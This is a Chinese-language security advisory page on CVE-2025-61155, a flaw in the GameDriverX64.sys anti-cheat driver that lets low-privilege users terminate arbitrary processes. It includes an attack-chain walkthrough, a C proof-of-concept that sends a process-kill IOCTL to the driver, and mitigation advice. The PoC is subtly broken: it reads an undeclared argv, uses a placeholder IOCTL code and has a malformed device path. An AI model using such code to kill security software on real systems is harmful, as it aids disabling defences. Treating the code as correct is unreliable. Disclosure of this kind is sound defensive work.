CVE-2025-61155 GameDriverX64.sys内核驱动IOCTL访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-61155

漏洞类型

访问控制漏洞/权限提升

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GameDriverX64.sys

漏洞概述

CVE-2025-61155是GameDriverX64.sys内核模式反作弊驱动中的一个中危访问控制漏洞。该驱动版本v7.23.4.7及更早版本存在严重的安全缺陷，其IOCTL处理程序缺乏适当的身份验证和访问控制机制。攻击者无需管理员权限即可利用此漏洞，通过用户态进程打开驱动设备句柄并发送特制的IOCTL请求。这些请求会在内核模式下执行，导致攻击者能够终止系统上的任意进程，包括关键系统进程和安全防护服务。由于攻击向量为本地且无需用户交互，低权限用户也能发起攻击，对系统可用性造成严重影响。

技术细节

GameDriverX64.sys是Windows系统上常用的游戏反作弊内核驱动。该漏洞存在于驱动的IOCTL(输入/输出控制)处理接口中。当用户态程序调用CreateFile打开驱动设备后，可向其发送特制的IOCTL请求。问题在于驱动在处理这些IOCTL请求时未进行充分的权限验证，允许任意用户态进程执行原本仅应内核代码或高权限进程才能执行的操作。具体而言，某些IOCTL码对应终止进程的功能，由于缺乏访问控制检查，低权限用户可通过构造特定的IOCTL请求触发进程终止操作。攻击者利用此漏洞可终止安全软件、系统关键进程或游戏反作弊服务，导致拒绝服务或为后续攻击创造条件。此类内核驱动漏洞的利用通常需要攻击者已在目标系统上获得代码执行能力。

攻击链分析

STEP 1

步骤1

攻击者在目标Windows系统上获得低权限用户态代码执行能力

STEP 2

步骤2

攻击者使用CreateFile API打开GameDriverX64驱动的设备对象，路径为\\\\.\\GameDriverX64

STEP 3

步骤3

攻击者构造包含目标进程PID的特制IOCTL请求，无需任何身份验证或权限检查

STEP 4

步骤4

驱动接收IOCTL请求后在内核模式上下文中执行，调用ZwTerminateProcess终止目标进程

STEP 5

步骤5

攻击者可终止安全软件、系统进程或游戏反作弊服务，造成拒绝服务或绕过安全防护

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdio.h>

#define IOCTL_TERMINATE_PROCESS 0x12345678  // Example IOCTL code

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    DWORD targetPID;
    
    // Target process PID to terminate
    targetPID = atoi(argv[1]);
    
    // Open handle to GameDriverX64 driver device
    hDevice = CreateFile(
        "\\\\\\.\\GameDriverX64",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open driver handle. Error: %d\n", GetLastError());
        return 1;
    }
    
    printf("Successfully opened driver handle.\n");
    printf("Attempting to terminate process with PID: %d\n", targetPID);
    
    // Send crafted IOCTL request to terminate arbitrary process
    // No privilege check is performed by the driver
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_TERMINATE_PROCESS,
        &targetPID,
        sizeof(targetPID),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    
    if (result) {
        printf("IOCTL request sent successfully.\n");
    } else {
        printf("IOCTL request failed. Error: %d\n", GetLastError());
    }
    
    CloseHandle(hDevice);
    return 0;
}

影响范围

GameDriverX64.sys <= v7.23.4.7

防御指南

临时缓解措施

由于该漏洞位于内核驱动层面，临时缓解措施有限。建议：1)限制非管理员用户加载驱动的权限；2)使用应用白名单策略阻止未知驱动加载；3)监控事件日志中的驱动加载事件；4)部署HIPS(主机入侵防御系统)检测可疑的驱动通信行为。最根本的解决方案是等待厂商发布安全更新并及时打补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61155
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61155
3 Details https://www.cvedetails.com/cve/CVE-2025-61155/
4 VulDB https://vuldb.com/cve/CVE-2025-61155
5 Link https://github.com/pollotherunner/CVE-2025-61155/blob/main/advisory.md
6 Link https://www.hotta.com.tw